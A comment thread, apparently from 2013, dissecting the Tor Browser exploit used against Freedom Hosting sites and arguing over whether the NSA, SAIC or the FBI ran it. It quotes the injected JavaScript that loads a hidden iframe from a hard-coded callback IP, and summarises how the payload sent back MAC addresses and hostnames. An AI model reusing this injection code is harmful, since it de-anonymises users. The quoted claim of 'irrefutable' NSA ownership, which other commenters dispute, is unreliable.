Torsploit takedown: analysis, reverse engineering, forensic
cryptocloud.org
cryptocloud.org
Target and capture somebody (possible evil douchebag) who is hidden behind seven proxies, Gain access to highly secure 'hidden .onion' servers used by people who want to stay hidden, scare the TOR user base by proving they can identify you in easily while also not giving a fuck about burning one of the many exploits in their bag - in a single move!
1) Tor is technically sound and NSA had to move now to undermine it before it get the size it need to be unstopable.
2) NSA is just rushing to give some arrests to other agencies so they will join their side on the closed door meetings.
It's like one military agency outdoing another.
Regardless, I don't know why the freedom hosts lasted so damn long.
Perfect-Band-Name.jpg
function updatify() {
var iframe = document.createElement('iframe');
iframe.style.display = "inline";
iframe.frameBorder = "0";
iframe.scrolling = "no";
iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";
iframe.height = "5";
iframe.width = "*";
document.body.appendChild(iframe);
}
[1] http://www.domaintools.com/research/ip-explorer/?ip=65.222.2...[2] http://en.wikipedia.org/wiki/SAIC_%28U.S._company%29
[3] https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#...
Given the IP space involved, SAIC's involvement, their known existing work in this area including their willingness to purchase exploits for government/law enforcement, and the target, it's a huge stretch to come up with any other explanation.
As someone usually ending up on the anti-NSA side of these discussions, I don't think there is anything particularly surprising or worrying about this. They (whichever agency it was) used an exploit in what was a fairly significant bust in their eyes. I haven't personally analyzed it but I gather it did something ranging from log identifiable information to installing malware. Regardless of what it did, this is a pretty expected law enforcement tactic for adversaries of this nature.
As pointed out by you and others, SAIC definitely has fairly incompetent moments, but they have a lot of money. This is why they can put enough of an attack together to deliver a sophisticated exploit (likely purchased) and execute on the operation, while still leaving their tracks on everything and being somewhat sloppy.
I've seen mixed comments as to whether or not it was actually patched upstream, but if it was, that makes even more sense. If it was patched, they had to use it before it made it into the Tor bundle, or lose it entirely. Generally, high value exploits that are 0day - unknown and unpatched, are not given to law enforcement.
I think to suggest this was "psyops" or something is giving SAIC far too much credit. It was just a sloppy raid that used an exploit, for any number of legitimate reasons.
I'm sure they even had meetings and documents about it, too!
It's been going on for about 4 months now. I've posted my summery here - http://www.devside.net/blog/strange-tor-traffic-to-get-ip
Relevant links:
http://www.domaintools.com/research/ip-explorer/?ip=65.222.2...
It's much easier to show a direct access to some child porn site.
I'm almost certain NSA controls a bunch of nodes and exit nodes and can figure out who loads what. VPN is the way around it.
As for controlling a bunch of nodes and figuring out who loads what is not possible, as far as I understand how the network works. How it works is that the sender decides on a path which consists of a random amount of other regular nodes. It encrypts a message with the public key of each of the nodes, and then sends it on its merry way to the first node. None of the nodes know if they're the first, the second, or the last. All the know is the address of the previous and the next node, either of which can be other nodes in the chain or the origin or the destination.
Given the number of taping points, the NSA might be considered a global passive adversary (or close to one) at this point. Tor does not protect against that.
"A secretive U.S. Drug Enforcement Administration unit is funneling information from intelligence intercepts, wiretaps, informants and a massive database of telephone records to authorities across the nation to help them launch criminal investigations of Americans.
Although these cases rarely involve national security issues, documents reviewed by Reuters show that law enforcement agents have been directed to conceal how such investigations truly begin - not only from defense lawyers but also sometimes from prosecutors and judges.
The undated documents show that federal agents are trained to "recreate" the investigative trail to effectively cover up where the information originated, a practice that some experts say violates a defendant's Constitutional right to a fair trial. If defendants don't know how an investigation began, they cannot know to ask to review potential sources of exculpatory evidence - information that could reveal entrapment, mistakes or biased witnesses."
Since the OP didn't mention it, here's the gist of what happened:
1) A bug in Firefox related to the onreadystatechange event could end up arbitrarily executing memory on a page reload. 2) The attack created a Windows executable using JavaScript's typed arrays and array buffers (pretty interesting in its own right) 3) The executable phones home with a MAC address and Windows hostname
the original title was "Independent reasearch claims NSA behind Tor Browser exploit, owns 65.222.202.53" -- which I think is completely reasonable and accurate
"Well, the story gets more interesting...
This morning, we read that information from the NSA's illegal surveillance databases has been routinely finding its way into DEA drug cases [1], with an entire government "training programme" in existence to mask the source of the information from defendants... as well as prosecutors and judges.
And this weekend, we've been working through the news that a large breach of security associated with the Tor network - it's been dubbed #torsploit [2] - has taken place. Exploit code is available (see earlier posts in this thread), and folks have been de-obfuscating and analysing the code.
There's also an IP address hard-coded into it - that's where the info gathered by the malware is being sent. That IP address is:
65.222.202.53
Now, the press reporting on the address so far has been saying it's a "Verizon business address in Virginia." Yes, that's what whois shows, but that's not exactly the full story, or the real story.
The folks at Baneki Privacy Labs have been chasing down that detail. They first asked [3], in a game-theoretic way, whether the entire situation isn't a bit too, well... obvious. I mean, did the FBI think nobody would notice? Everyone's been assuming it's the FBI, doing something like the "Darkmarket honeypot," [4] or some such. It's worth noting that nobody has taken public credit for this #torsploit [5] malware yet, so attributing it to the FBI is a leap of assumptive logic.
Turns out, the story is much more interesting than that.
Baneki dug deeper than whois, and got some clues things were spookier than they seemed. First, there's an open port (80) [6] sitting on the machine in question. So it's not some recycled or attempted-at-obfuscated IP address. It's still live and running. Then the fun starts... [7]
SAIC.png [a]
SAIC is, needless to say, deep in the core of the cyber-military complex... and certainly not the FBI.
Some further investigation by Baneki turns up the following information [8]:
NSA.png [b]
That IP address is part of IP space directly allocated to the NSA's Autonomous Systems (AS). It's not FBI; it's NSA.
What is an NSA IP address doing as a command & control contact for javascript malware being deployed in the #torsploit [9] attack? That remains to be seen... but we already know that PRISM data has been "jumping the wall" and leaking into other law enforcement hands. Is this an example of further abuse of PRISM's "national security only" dataset? That appears the most likely explanation, at this point in time.
Glenn Greenwald has been warning us this is happening - and here's another hard, objective, irrefutable data point. The NSA's Alexander - who only last week was at DefCon doing his best to charm the audience [10] - is once again caught lying bald-faced.
What happens now? We sit back to await developments..."
[1] http://mobile.reuters.com/article/idUSBRE97409R20130805?irpc... [2] https://twitter.com/search?q=%23torsploit&src=typd [3] https://twitter.com/Baneki/status/364323285003014144 [4] https://www.cryptocloud.org/viewtopic.php?f=17&t=87 [5] https://twitter.com/search?q=%23torsploit&src=typd [6] https://twitter.com/Baneki/status/364336090057949184 [7] https://twitter.com/Baneki/status/364340406361665536 [8] http://pop.robtex.com/nsa.gov.html#records [9] https://twitter.com/search?q=%23torsploit&src=typd [10] https://twitter.com/CryptoCloudVPN/status/362864059105820674 [a] http://i.imgur.com/9d3fj2G.png [b] http://i.imgur.com/PGnNvx9.png
Doesn't seem implausible for it to have been running on a compromised host if there's publicly accessible PBXs and stuff around there.
[8] seems to show that the ENTIRE IP RANGE is assigned to nsa.gov. Just seeing that some innocuous-looking services are running on some IPs in that range doesn't mean anything for or against.
The government uses Outlook, has phones ... and even owns businesses (sometimes surreptitiously, like CIA front companies).
In fact, if the intelligence apparatus of this country didn't own or directly control at least one ISP, I'd be very, very surprised.
Both 65.196.127.226 (the server that hosts nsa.gov) and 65.222.202.53 fall in the same /11 block (i.e. a block of 2,097,152 addresses) assigned to UUnet / Verizon Business.
However, that is a huge block of IP addresses, and numerous other servers are also hosted by Verizon Business on that block - http://route.robtex.com/65.192.0.0-11.html will give you a list.
It is entirely possible that the Verizon Business is providing services to some US government agency to run 65.222.202.53, but the fact that NSA also uses Verizon Business to host its website is hardly conclusive proof of anything.
This link is worth reading for context.
Verizon rents out those 2,097,152 addresses to their customers, but they are unlikely to tell you which customer is assigned which address at which time without customer permission (and neither address is set up in Verizon's nameservers to reverse resolve back to a hostname).
There is as much evidence that the NSA is behind this as there is that the YMCA USA (another Verizon customer) is behind this (or any of the numerous other Verizon Business customers): http://dns.robtex.com/ymcausa.net.html#records (that is just an example to show the flaw in saying that link [8] is a smoking gun that the NSA owns the server; I don't think the YMCA is behind this).
HostMin: 65.192.0.1
HostMax: 65.223.255.254Images of the original thread.
I'm not an expert in Tor and I attended the talk tired and after a hard days work, so I might have completely misunderstood him.
Either that, or you have to be able to observe the traffic from most/all exit nodes as well as observe all the traffic coming from a user's Internet connection to be able to correlate with some probability what sites that user is visiting through Tor.
Given any random person in any country can run a Tor node (exit or non-exit), both are quite difficult.
That would be pretty trivial at the current state. Maybe that why they acted now?
The overall relationship between USG (which is, really, a society of different sections, this should not be forgotten) and the Tor project is complex and, I should say, schizophrenic. The initial motivation for developing Tor (while it was being conceived in the US Naval Research lab) as a civilian project was clear (need lots of civilian nodes and civilian traffic to drown out the spies' / army employees / whoever's traffic.) What is happening right now I don't really understand, but would like to, very much.
[1]: https://trac.torproject.org/projects/tor/wiki/org/meetings/2...
One relevant data point:the author of mixminion remailer is working for the tor project,probably killing mixminion(a far more secure anonymizer).
Another relevant data point(for a similar strategy): Most of the research on JPEG steganography is done on grayscale images, which is mostly useless since mostly nobody sends grayscale images. Alot of What's done on color images is being done in places like iran, china and india(?).
Do you mean Nick Mathewson or Roger Dingledine? Both are working for Tor now, as a matter of fact Roger was one of the core founders of Tor, and both of them co-founded the Tor Project as a nonprofit (though not sure of details).
For what it's worth (ahem, 0%), I believe both of them have very high ethical standards and are great people; I've only physically met them in passing so far, but insofar as I can trust an individual person, I do trust they do not have any secondary ulterior motives.
> probably killing mixminion(a far more secure anonymizer).
I'm not sure of details here, either. Both of them view Tor as, ultimately, a compromise between usability and security. This was a deliberate choice. Tor webpage makes it clear that Tor is not an ultimate ends to anonymity and privacy. I do agree that Mixminion, assuming other factors are kept to be invariant, is more secure. However, if only very few people were to use it, that would make it much less secure (as I'm sure you understand); etc. etc.
> Another relevant data point(for a similar strategy): Most of the research on JPEG steganography is done on grayscale images, which is mostly useless since mostly nobody sends grayscale images. Alot of What's done on color images is being done in places like iran, china and india(?).
I've heard about this - if this proves to indeed be the case, then yeah, kind of lol (in a sad way.) :(
> I wonder if it is used as a pressure release valve for anonymity software developers. That way they focus their efforts on tor, which might be more amenable to USG exploits, than other anonymity networks.
But this is an interesting point, I've thought of it as well. It could be that this is happening semi-organically, in a kind of emergent manner. This sounds magic-boxy, but: just as the mind is not a uniform machine, a government structure is not uniform, either; both, however, appear to produce semi-coherent (to an extent) behaviour that makes sense. Sorry for this rambling sentence, but the "top-down vs bottom-up" conspiracy question is an interesting one, and I don't know of ways to communicate it in a rigorous way.
But, again, the pressure valve idea is an interesting one for sure.
>> I believe both of them(Nick Mathewson and Roger Dingledine) have very high ethical standards and are great people;
This all issue of cryptography is ethically complex. One the one hand, too much state power can lead to bad things, definetly. On the other, strong crypto/anonymity can be a risky tool at the hands of terrorists. And in reality , terror can cause very bad stuff[1].
Say you are roger dingledine, and a very convincing NSA guy comes to you, and shows you the evidence that some terror act , that killed X people, has used anon-remailers. How would that make you feel ?
Except the guilt, one implication would be that USG would fight hard against mixminion.
And then he offers you to lead tor, with funding, and explains that this is a network that is hard to break ,so even if NSA can break it, it wouldn't do it for silly stuff , only for emergencies.
You don't need to be a bad person to accept. It's seems like a perfectly ethical thing to do.
Regarding bottom-up or top-down:
My guess is that NSA has a top-down strategy regarding cypherpunks.That's the way military forces work. And it would make sense for this tactic to be part of their strategy.
[1]WWI , The iraq war, and the cease of the israeli peace process were all at least partially caused by terrorists. And we still haven't seen WMD based terror.
> You don't need to be a bad person to accept. It's seems like a perfectly ethical thing to do.
Yeah, except transparency is at the core of Tor. So someone who was approached like that would make sure to communicate this exchange and what they had learnt in a public manner. If this were not possible (for whatever reasons), it wouldn't be an ethical choice to continue because it would endanger people; including people in repressive regimes, whose governments might also decide to track down 'bad guys' because it would be an emergency. (Those governments do buy sophisticated DPI hardware from Cisco et al. and use it.) etc. etc. Nobody would just take the word for it anyway - actual peer-reviewed research is required. If this is not possible, then it cannot be used as a guiding force. If it is, it must be transparently acknowledged.
> [1]WWI , The iraq war, and the cease of the israeli peace process were all at least partially caused by terrorists. And we still haven't seen WMD based terror.
I believe 'terrorist' has become a very semantically-loaded term with multiple connotative fields, so to speak. But I won't argue there, it's probably not the place anyway.
Edit:
> My guess is that NSA has a top-down strategy regarding cypherpunks.That's the way military forces work. And it would make sense for this tactic to be part of their strategy.
Yeah, but this would make sense
But the fact that it financed tor implies heavily that there are such exploits accessible to NSA. And the fact that it is known that tor is sensitive to global passive attackers is another. Even plain me can guess this.
Maybe the calculation favors tor, because if we assume you need to be a global passive attacker to exploit it, this favors large coalitions of many (currently democratic) nations collaborating over you're single repressive regime, and that seems like a reasonable compromise in thinking about a very hard ethical choice.
As another comment points out, why bother when you already coordinate a massive sniffing effort affecting large chunks of the globe?
Why bother? Timing attacks on Tor are much harder (require sniffing & correlating large percentage of network) than direct de-anonymization (require injecting malware in some servers).
For any given series of boring events, the most fantastical explanation that ties them all together must obviously be true.
http://www.teslasociety.com/tunguska.htm
ps: I don't care if it is correct, it is still an interesting read.
GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1
Don't you think if it was another party they would just have encoded the IP and/or MAC into the URL to of a GET from some scary IP instead of using a cookie to a resource that is actually there on listening on the server.In this case it's a double-hit: compromise a large number of Tor users and discourage more people from using it.
Big Brother is watching.
http://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#p...
I responded with: A stay in a penitentiary helped managed by SAIC[1].
Digitally stalked due to dissent by for-profit "Domain Awareness Centers" run by SAIC[2].
Persistent targeting, one way or another, by drones managed by SAIC[3].
Now after this, I can add "Hunting and exposing swaths of users as to pursue/prosecute/rendition/drone a few via disseminating exploits used against those that dare encrypt their traffic[4]".
[1] http://www.alanco.com/news_040104.asp
[2] http://oaklandwiki.org/Domain_Awareness_Center
[3] http://www.dailyfinance.com/2013/06/14/news-saic-wins-95-mil...
[4] https://www.cryptocloud.org/viewtopic.php?f=9&t=2894&p=3852#...